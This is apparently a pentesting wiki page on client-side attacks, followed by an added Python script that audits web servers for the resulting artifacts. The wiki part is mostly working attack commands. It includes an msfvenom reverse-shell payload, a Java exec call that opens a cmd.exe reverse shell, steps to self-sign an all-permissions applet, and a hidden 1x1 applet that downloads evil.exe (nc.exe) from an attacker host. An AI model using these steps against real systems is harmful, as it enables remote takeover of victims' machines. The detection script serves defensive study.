Client side attacks

lethanhtung01011980 edited this page Dec 21, 2019 · 7 revisions

Goals

  • To attack through a client-side application.

JavaScript payload

Unicode JavaScript payload

  • msfvenom -p windows/shell_reverse_tcp LHOST=attacker-ip LPORT=443 -f js_le -e generic/none

Java Applet

Run reverse shell from Java

  • f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " attacker_ip attacker_listen_port -e cmd.exe");

Compile Java applet

  • You may need to use a suitable JDK for this, for example the one in /usr/lib/jvm/java-8-openjdk-i386/bin/
  • javac -source 1.7 -target 1.7 Java.java

Add permission

  • echo "Permissions: all-permissions" > /root/manifest.txt

Create jar file

  • jar cvf Java.jar Java.class

Sign Java Applet

  • keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123
  • jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

Copy Java Applet to web server

  • cp Java.class SignedJava.jar /var/www/html/

Create html file with embedded Java applet

  • echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://attacker-ip:80/evil.exe"></applet>' > /var/www/html/java.html
  • evil.exe can be nc.exe.
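
A defender-side check for the artifacts this procedure leaves on a web server, added here as an example and not part of the original wiki page: it flags a near-invisible `<applet>` tag, a `<param>` pointing at an executable, and a JAR whose manifest asks for `Permissions: all-permissions`. The function names, the extension list and the sample data are constructed assumptions, and the signature check only looks for a signature block file without verifying it.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

EXEC_EXT = re.compile(r"\.(exe|dll|scr|bat|ps1)(\?|$)", re.I)
SIG_BLOCK = re.compile(r"META-INF/[^/]+\.(RSA|DSA|EC)", re.I)

class AppletAudit(HTMLParser):
    """Collect findings for <applet>/<param> tags shaped like the one above."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self.findings.append(f"applet archive={a.get('archive')}")
            if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
                self.findings.append("applet is effectively invisible")
        elif tag == "param" and EXEC_EXT.search(a.get("value") or ""):
            self.findings.append(f"param points at executable: {a['value']}")

def audit_html(html):
    parser = AppletAudit()
    parser.feed(html)
    return parser.findings

def audit_jar(jar_bytes):
    """Return (Permissions value or None, has_signature_block) for a JAR."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = jar.namelist()
        has_mf = "META-INF/MANIFEST.MF" in names
        manifest = jar.read("META-INF/MANIFEST.MF") if has_mf else b""
    m = re.search(rb"^Permissions:\s*(\S+)", manifest, re.M | re.I)
    # Presence of a signature block only; the signature is NOT verified here.
    signed = any(SIG_BLOCK.fullmatch(n) for n in names)
    return (m.group(1).decode() if m else None), signed

def constructed_jar():
    """Build a stand-in JAR in memory (constructed sample, not a real applet)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Permissions: all-permissions\r\n")
        jar.writestr("META-INF/SIGNAPPL.DSA", b"placeholder")
    return buf.getvalue()

# Constructed sample: the <applet> markup from the step above, minus its id.
SAMPLE_HTML = ('<applet width="1" height="1" code="Java.class" archive="SignedJava.jar">'
               '<param name="1" value="http://attacker-ip:80/evil.exe"></applet>')
print(audit_html(SAMPLE_HTML), audit_jar(constructed_jar()))
```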
